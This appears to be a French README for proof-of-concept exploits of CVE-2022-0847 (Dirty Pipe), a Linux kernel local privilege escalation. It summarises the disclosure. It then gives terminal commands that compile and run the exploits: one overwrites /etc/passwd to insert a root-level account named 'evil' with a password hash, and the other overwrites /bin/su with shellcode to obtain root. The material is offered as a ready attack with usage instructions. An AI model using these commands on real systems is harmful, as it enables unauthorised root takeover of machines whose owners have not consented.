
Exploits de preuve de concept pour CVE-2022-0847 (Dirty Pipe) permettant l'escalade de privilèges locale sur les noyaux Linux 5.8+ en écrasant des fichiers en lecture seule ou des binaires SUID.
Aujourd'hui, le chercheur en sécurité Max Kellermann a divulgué de manière responsable la vulnérabilité 'Dirty Pipe' et a déclaré qu'elle affecte le noyau Linux 5.8 et les versions ultérieures, même sur les appareils Android.
La vulnérabilité est suivie sous le nom CVE-2022-0847 et permet à un utilisateur non privilégié d'injecter et d'écraser des données dans des fichiers en lecture seule, y compris les processus SUID qui s'exécutent en tant que root.
Kellermann a découvert le bug après avoir traqué un bug qui corrompait les journaux d'accès d'un serveur web pour l'un de ses clients.
Ensuite, Bl4sty a écrit une autre version. Au lieu d'écraser un fichier comme /etc/passwd, il écrase un binaire SUID spécifié par l'utilisateur (comme /bin/su), injectant un shellcode qui est ensuite exécuté avec les permissions d'un utilisateur privilégié (c'est-à-dire root).
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
Pour une utilisation détaillée, référez-vous à : https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf